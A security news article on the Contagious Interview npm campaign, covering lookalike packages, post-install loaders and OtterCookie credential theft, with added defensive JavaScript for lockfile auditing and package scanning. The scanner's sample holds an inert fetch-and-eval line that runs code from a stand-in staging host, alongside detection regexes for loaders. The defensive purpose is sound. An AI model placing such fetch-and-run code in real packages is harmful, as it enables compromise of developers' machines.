Researchers at Socket have uncovered more details of a sophisticated software supply-chain operation linked to the Contagious Interview campaign attacking developers who rely on packages from NPM.
They report finding a “full stack” operation behind the attacks, in which code hosting, package distribution, staging servers and command-and-control (C2) infrastructure are orchestrated much like a legitimate software development and delivery pipeline — and offer developers fresh advice on protecting themselves against the attacks.
In the latest wave, threat actors uploaded almost 200 new malicious NPM packages, with more than 31,000 recorded downloads. The campaign lures victims with fake job interviews and coding assignments related to Web3 and blockchain projects, asking them to pull dependencies for a “test project”. But the NPM packages they install are Trojan horses.
The latest packages identified by Socket ultimately deliver a new payload with upgraded credential theft, system monitoring and remote access capabilities, enabling them to take over developers’ accounts and machines.
Point defense
Based on its latest analysis, Socket advised developers to focus on the weak points this campaign exploits, and to treat every “npm install” as potential remote code execution, restrict what continuous-integration runners can access, enforce network egress controls, and review the code of any new templates or utilities pulled from GitHub. Teams should also scrutinize unfamiliar helper packages, pin known-good versions, and use lockfiles instead of auto-updating dependencies, it advised.
Automated package analysis can further reduce risk, with real-time scans catching threats including import-time loaders, network probing, and bulk data exfiltration before they hit developer machines or CI systems.
With these checks in place, dependency onboarding and code review become effective filters for blocking Contagious Interview-style attacks early, Socket said.
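The pinning and lockfile advice above is easier to enforce as an automated gate than as a review habit. What follows is an added example, not Socket's code or anything from the article, of a pre-install policy check over a project's package.json and package-lock.json: it flags dependency specifiers that float (^, ~, x-ranges, dist-tags such as "latest"), specifiers that bypass the registry entirely (git, http, file and npm: aliases, or the "owner/repo" GitHub shorthand), and lockfile entries that lack an integrity hash or resolve outside registry.npmjs.org. The manifests, package names ("dev-helper", "interview-test-project"), hosts and hashes in it are constructed placeholders.

```javascript
// Added example (not Socket's or the article's code): a pre-install policy check over
// package.json and package-lock.json. All inputs are constructed inline so it runs offline.

const EXACT_VERSION = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$/;
const REGISTRY = "https://registry.npmjs.org/";
const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies"];

// Classify one dependency specifier as it appears in package.json.
function classifySpec(spec) {
  if (EXACT_VERSION.test(spec)) return "pinned";
  // git/http/file/alias specs skip registry provenance and have no lockfile integrity hash.
  if (/^(git\+|git:|github:|gitlab:|bitbucket:|https?:|ssh:|file:|npm:)/.test(spec)) return "non-registry";
  if (/^[\w.-]+\/[\w.-]+(#.*)?$/.test(spec)) return "non-registry"; // "owner/repo" GitHub shorthand
  return "floating"; // ^, ~, *, x-ranges, dist-tags such as "latest": resolved at install time
}

// Every dependency that is not an exact version is a finding.
function auditManifest(manifest) {
  const findings = [];
  for (const field of DEP_FIELDS) {
    for (const [name, spec] of Object.entries(manifest[field] || {})) {
      const kind = classifySpec(spec);
      if (kind !== "pinned") findings.push({ field, name, spec, problem: kind });
    }
  }
  return findings;
}

// lockfileVersion 2/3 layout: every installed package must carry an integrity hash and
// resolve to the expected registry. Workspace links and the root entry are skipped.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "" || entry.link) continue;
    if (!entry.integrity) findings.push({ path, problem: "missing-integrity" });
    if (!entry.resolved || !entry.resolved.startsWith(REGISTRY)) {
      findings.push({ path, problem: "non-registry-resolved", resolved: entry.resolved });
    }
  }
  return findings;
}

// Constructed sample project: names, URLs and the hash value are placeholders.
const MANIFEST = {
  name: "interview-test-project",
  dependencies: {
    "tailwind-merge": "2.5.4",                 // pinned
    "lodash": "^4.17.21",                     // floating
    "dev-helper": "github:someone/dev-helper", // hypothetical non-registry dependency
  },
  devDependencies: { eslint: "latest" },       // floating dist-tag
};
const LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    "": { name: "interview-test-project" },
    "node_modules/tailwind-merge": {
      version: "2.5.4",
      resolved: "https://registry.npmjs.org/tailwind-merge/-/tailwind-merge-2.5.4.tgz",
      integrity: "sha512-PLACEHOLDER-NOT-A-REAL-HASH", // placeholder value
    },
    // git dependencies get no integrity field and resolve to the git host
    "node_modules/dev-helper": {
      version: "1.0.0",
      resolved: "git+ssh://git@github.com/someone/dev-helper.git#constructed-ref",
    },
  },
};

function report(manifest, lock) {
  return { manifest: auditManifest(manifest), lockfile: auditLockfile(lock) };
}

console.log(JSON.stringify(report(MANIFEST, LOCKFILE), null, 2));
```

Run the check before `npm ci --ignore-scripts` in CI: `npm ci` refuses to install when package.json and the lockfile disagree, and `--ignore-scripts` keeps lifecycle hooks from running until install scripts have actually been reviewed. Note that the lockfile walk only understands the lockfileVersion 2/3 `packages` map, not the legacy `dependencies` tree.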
Coding tasks lead to malware delivery
These defensive measures are effective because Contagious Interview’s entry vector relies heavily on social engineering, using fake interview tasks to trick developers into installing compromised dependencies.
The campaign exploits NPM, a widely used package registry for JavaScript and Node.js, by publishing packages that appear benign but carry hidden payloads. The malicious packages, including one named “tailwind-magic”, mimic legitimate libraries to avoid suspicion (in this case a lookalike of the genuine “tailwind-merge” utility).
When an unsuspecting developer installs such a package, a post-install script triggers and reaches out to a staging endpoint hosted on Vercel. That endpoint in turn delivers a live payload fetched from a threat-actor-controlled GitHub account named “stardev0914”. From there the payload, a variant of OtterCookie that also folds in capabilities from the campaign’s other signature payload, BeaverTail, executes and establishes a remote connection to the attackers’ control server. The malware then silently harvests credentials, crypto-wallet data, browser profiles and more.
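The chain just described (install hook, fetch from a staging host, execute whatever comes back) is also what the automated package analysis in the “Point defense” section is looking for. The following is an added example, not Socket’s tooling or anything from the article, of a heuristic review that scores a package on that combination rather than on any single indicator. The two sample packages are constructed and inert: “string-utils-example” and “interview-helper” are hypothetical names, the setup.js shown is a string that is only pattern-matched and never executed, and “staging-example.vercel.app” is a made-up host, not the endpoint in the report.

```javascript
// Added example (not Socket's tooling): heuristic review of an npm package for the
// staged-loader pattern in the article: install hook -> fetch from a staging host ->
// execute the response. Packages are plain objects so the check runs offline.

const HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Source-level indicators. Each is common in benign code on its own; the risk rating
// below keys on their combination with an install-time hook.
const SOURCE_RULES = [
  { id: "remote-fetch",  pattern: /\b(fetch|https?\.(get|request)|axios\.(get|post))\s*\(\s*["'`]https?:\/\// },
  { id: "staging-host",  pattern: /https?:\/\/[\w.-]+\.vercel\.app\b|raw\.githubusercontent\.com/i },
  { id: "dynamic-eval",  pattern: /\b(eval|new Function|vm\.runIn(This|New)Context)\s*\(/ },
  { id: "child-process", pattern: /require\(\s*["']child_process["']\s*\)|from\s+["']child_process["']/ },
  { id: "encoded-blob",  pattern: /Buffer\.from\(\s*["'][A-Za-z0-9+/=]{64,}["']\s*,\s*["']base64["']\s*\)/ },
];

// pkg = { manifest: <package.json object>, files: { <path>: <source text> } }
function auditPackage(pkg) {
  const findings = [];
  const scripts = pkg.manifest.scripts || {};
  for (const hook of HOOKS) {
    if (scripts[hook]) findings.push({ rule: "lifecycle-hook", where: hook, detail: scripts[hook] });
  }
  for (const [path, source] of Object.entries(pkg.files)) {
    for (const rule of SOURCE_RULES) {
      const m = source.match(rule.pattern);
      if (m) findings.push({ rule: rule.id, where: path, detail: m[0] });
    }
  }
  return findings;
}

// "high" needs the whole chain; "medium" is a loader that would fire at import time
// rather than at install; anything else with findings is flagged for manual review.
function riskLevel(findings) {
  const ids = new Set(findings.map((f) => f.rule));
  const runsAtInstall = ids.has("lifecycle-hook");
  const pullsRemoteCode = ids.has("remote-fetch") || ids.has("staging-host");
  const executes = ids.has("dynamic-eval") || ids.has("child-process");
  if (runsAtInstall && pullsRemoteCode && executes) return "high";
  if (pullsRemoteCode && executes) return "medium";
  if (findings.length > 0) return "review";
  return "clean";
}

// Constructed samples. The suspicious one is an inert stand-in for the pattern: its
// setup.js is a string that is matched, never run, and the host is made up.
const BENIGN = {
  manifest: { name: "string-utils-example", version: "1.0.0", main: "index.js" },
  files: {
    "index.js": 'module.exports = (a, b) => [...new Set((a + " " + b).split(/\\s+/))].join(" ");',
  },
};
const SUSPICIOUS = {
  manifest: { name: "interview-helper", version: "1.0.0", main: "index.js", scripts: { postinstall: "node setup.js" } },
  files: {
    "index.js": 'module.exports = require("string-utils-example");',
    "setup.js": 'fetch("https://staging-example.vercel.app/api/init").then(r => r.text()).then(src => eval(src));',
  },
};

for (const pkg of [BENIGN, SUSPICIOUS]) {
  const findings = auditPackage(pkg);
  console.log(pkg.manifest.name, riskLevel(findings), findings.map((f) => `${f.rule}@${f.where}`).join(", "));
}
```

The scoring is deliberately conjunctive: a lone `postinstall` that compiles a native addon, or a lone `fetch` in an HTTP client library, should not trip a blocking gate, whereas an install hook that retrieves and evaluates remote code has no benign reading. Regex matching of this kind is a triage filter, not a substitute for running the package in a sandbox with network egress logged.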
“Tracing the malicious npm package tailwind-magic led us to a Vercel-hosted staging endpoint, tetrismic[.]vercel[.]app, and from there to the threat actor controlled GitHub account which contained 18 repositories,” Socket’s senior threat intelligence analyst Kirill Boychenko said in a blog post, crediting related research by Kieran Miyamoto that helped confirm the malicious GitHub account stardev0914.
A ‘full stack’ adversary: GitHub, Vercel, and NPM
What makes this campaign stand out is the layered infrastructure behind it. Socket’s analysis traced not just the NPM packages but also how the attackers built a complete delivery pipeline: malware-serving repositories on GitHub, staging servers on Vercel, and separate C2 servers for exfiltration and remote command execution.
Through this setup, attackers can rotate payloads, update malware unobtrusively, and tailor deployments per target—all while blending deeply into the legitimate developer ecosystem, according to Boychenko.
Once installed, OtterCookie doesn’t just run and vanish: it remains persistent, capable of logging keystrokes, hijacking the clipboard, scanning the filesystem, capturing screenshots, and grabbing browser and wallet credentials across Windows, macOS and Linux.
The campaign actors’ intensified NPM activity arrives at a worrying moment for the JavaScript and open-source ecosystem. In recent months, the community has seen a flurry of NPM-based attacks — including worm-style campaigns that transformed popular packages into Trojan horses, automated credential theft, and widespread supply chain compromise across both development and CI environments.
This article was first published on Infoworld.
The original article, “Contagious Interview attackers go ‘full stack’ to fool developers”, can be found on CSO Online.